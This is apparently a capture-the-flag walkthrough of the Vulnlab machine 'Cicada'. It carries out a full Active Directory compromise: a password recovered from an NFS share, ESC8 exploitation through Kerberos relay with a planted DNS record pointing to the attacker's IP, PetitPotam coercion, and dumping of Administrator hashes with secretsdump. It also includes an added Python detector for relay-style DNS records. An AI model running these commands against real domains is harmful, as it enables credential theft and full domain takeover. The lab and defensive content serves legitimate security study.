
VulnCicada

(Medium , Windows , Vulnlab Machine)


OVERVIEW


So we are given the IP address of the machine, so let’s head to Nmap and scan it

ENUMERATION

So these are the open ports, along with the domain and domain controller name. Be sure to add these to /etc/hosts

Port 2049 caught my eye, since it has the NFS service open, so I quickly performed

showmount -e 10.129.234.48

It showed a /profiles export, so let’s mount it using mount

mkdir /mnt/profiles
mount -t nfs 10.129.234.48:/profiles /mnt/profiles

After it gets mounted, let’s head to /mnt/profiles and enumerate further

We found 14 user directories, of which only Administrator and Rosie.Powell have any files, so let’s copy those two user directories somewhere else to look at the files more thoroughly

On inspecting the Administrator directory we found

Let’s check out vacation.png and the other files too

There doesn’t seem to be any information in the image or in the other files, so let’s check the Rosie.Powell user directory now

It also has an image named marketing.png, so let’s open the image and check out the other files too

While the other files didn’t give any info, the marketing.png image revealed a password-like string: Cicada123


EXPLOITATION

Now that we have a user and a password, let’s try other services such as SMB, LDAP, web, RDP etc.

On checking the website on port 80 we found nothing but the default IIS Windows web server page and a non-accessible /CertEnroll directory, so now let’s move on to other services.

We realized that NTLM authentication over SMB is disabled, so there is no other way than Kerberos authentication; let’s do that with the help of the -k flag

nxc smb 10.129.234.48 -u Rosie.Powell -p Cicada123 -k

We can see that we can now authenticate over SMB and access shares. I saw a share named CertEnroll, which we also saw during our web enumeration; as the name suggests, this points towards AD CS (Active Directory Certificate Services), so let’s run Certipy to see whether any vulnerable templates are there or not.

First, let’s grab a TGT for the Rosie.Powell user so that Kerberos authentication will be easier later on. For this we can use impacket-GetTGT

Now let’s run Certipy, but before that change your /etc/krb5.conf to the following one, because we are using Kerberos authentication and configuring the realm properly avoids any issues

[libdefaults]
    default_realm = CICADA.VL
    dns_lookup_realm = false
    dns_lookup_kdc = true

[realms]
    CICADA.VL = {
        kdc = 10.129.234.48
        admin_server = 10.129.234.48
    }

[domain_realm]
    .cicada.vl = CICADA.VL
    cicada.vl = CICADA.VL

certipy find -vulnerable -u Rosie.Powell@cicada.vl -dc-ip 10.129.234.48 -dc-host DC-JPQ225.cicada.vl -k -no-pass -stdout

NOTE: If you are running Certipy in a virtual environment, check with klist that the ticket is there; if it says there is no valid ticket, export the ticket again (set KRB5CCNAME) inside the virtual environment

Here we go: we found the ESC8 vulnerability, as Web Enrollment is enabled over HTTP

So what is ESC8? Let’s read a bit about it

ESC8 – NTLM Relay on AD CS Web Enrollment
ESC8 is one of the most frequently encountered exploitation scenarios in internal auditing. It presents a particularly high risk because it can be exploited without any domain account, making it a prime target for an external attacker who already has a favorable network position. The central condition for this attack is the presence of the Enrollment web service enabled on the AD CS server. This service allows a client to submit a certificate request via a web interface, typically accessible via the URL http://<server_name>/certsrv. If this service is enabled and poorly secured, it becomes possible to relay NTLM authentication from another host (such as a domain controller) to the CA server.

Now, since NTLM is disabled and NTLM self-relay is also not possible, let’s use Kerberos relaying over SMB to exploit this

Let’s study it using this blog: BLOG
From it we learn that we can relay Kerberos over SMB using a specially crafted DNS entry.

First of all, we need to add the magic DNS entry and make it point back to our machine. We will use bloodyAD for this

bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA YOUR_IP
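From the defender’s side, that DNS entry is the detection opportunity: it is a real host name with a long base64-looking blob appended, pointing at an IP that is not the host’s. The script below is an added example, not from the original post, that flags such records in a list of (name, type, data) zone entries; the sample records and the 10.10.14.5 address are constructed.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample of AD-integrated DNS records (name, type, data); not from the original post.
# The second entry mimics the relay-style name that bloodyAD creates in the write-up.
SAMPLE_RECORDS: List[Tuple[str, str, str]] = [
    ("DC-JPQ225", "A", "10.129.234.48"),
    ("DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA", "A", "10.10.14.5"),  # constructed attacker IP
    ("workstation01", "A", "10.129.234.60"),
    ("fileserver", "CNAME", "dc-jpq225"),
]

BASE64_ALPHABET = re.compile(r"[A-Za-z0-9+/]+=*")
MIN_BLOB_LEN = 24      # the marshaled target-info tail is far longer than any normal host label
ZERO_RUN = "AAAAAAAA"  # base64 of a run of zero bytes, typical of the marshaled structure's padding


def find_relay_style_names(records, extra_known_hosts: Optional[List[str]] = None) -> List[Dict[str, str]]:
    """Flag records whose name is a known host name with a long base64-looking tail appended,
    which is how a Kerberos-relay DNS entry disguises itself as an existing machine."""
    known = {name.lower() for name, _, _ in records}
    known |= {h.lower() for h in (extra_known_hosts or [])}
    legit_ip = {name.lower(): data for name, rtype, data in records if rtype == "A"}
    findings: List[Dict[str, str]] = []
    for name, rtype, data in records:
        lname = name.lower()
        # Try the longest known host first so "dc-jpq225" wins over any shorter prefix.
        for host in sorted(known, key=len, reverse=True):
            if lname == host or not lname.startswith(host):
                continue
            tail = name[len(host):]
            if len(tail) >= MIN_BLOB_LEN and BASE64_ALPHABET.fullmatch(tail) and ZERO_RUN in tail:
                findings.append({
                    "record": name,
                    "mimics": host,
                    "type": rtype,
                    "points_to": data,
                    "legit_ip": legit_ip.get(host, "unknown"),
                })
                break
    return findings


if __name__ == "__main__":
    for f in find_relay_style_names(SAMPLE_RECORDS):
        print(f"[!] {f['record']} looks like a relay entry for {f['mimics']} "
              f"(-> {f['points_to']}, real host is {f['legit_ip']})")
```

Feed it the output of a zone export (or the dnsNode objects from LDAP) and alert on any hit, since normal machines never register names shaped like this.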

After you have added the DNS entry, we can set up a relay using Certipy once again (make sure you use the latest Certipy, which has the relay command); you can use the Certipy version I mentioned earlier

certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController

Finally, we can use nxc to coerce the remote machine into authenticating back to us over Kerberos using the PetitPotam method.

So in another terminal do

nxc smb DC-JPQ225.cicada.vl  -u Rosie.Powell -p Cicada123 -k -M coerce_plus -o LISTENER=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA METHOD=PetitPotam

Let’s observe the output in our relaying terminal

As you can see, we got the certificate. Don’t worry if it fails; run the Certipy and nxc commands again on both sides as shown above and you will get it

NOTE: If you are getting an Attributes error saying yours is 0 and it should be between 1 and 64, then you are either using an outdated Certipy or the Kali-packaged Certipy (certipy-ad), so I recommend using the Certipy mentioned above in a virtual environment like me to avoid this error

Now that we have the certificate, let’s use it to get the domain controller’s NTLM hash

certipy auth -pfx dc-jpq225.pfx -dc-ip 10.129.234.48

Now we have the NTLM hash of the machine account. Since NTLM authentication is disabled, we can use the ccache file instead and dump the hashes of the Administrator user.

export KRB5CCNAME=dc-jpq225.ccache

secretsdump.py -k -no-pass dc-jpq225.cicada.vl -just-dc-user Administrator

Here We GO!!


FLAGS

We got the Administrator hash. Now, outside the virtual environment, let’s grab an Administrator TGT and use it to log in; you can also log in directly with the hash, without the TGT and ccache

getTGT.py cicada.vl/Administrator -hashes :hash
export KRB5CCNAME=Administrator.ccache
impacket-psexec cicada.vl/administrator@DC-JPQ225.cicada.vl -k -hashes :hash

And we got a SYSTEM shell. Now let’s get our flags

Here We Go !!

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

HTB MACHINES

Part 7 of 9

In This Series I Will Provide Full Walkthroughs Of Retired Machines On Hack The Box!
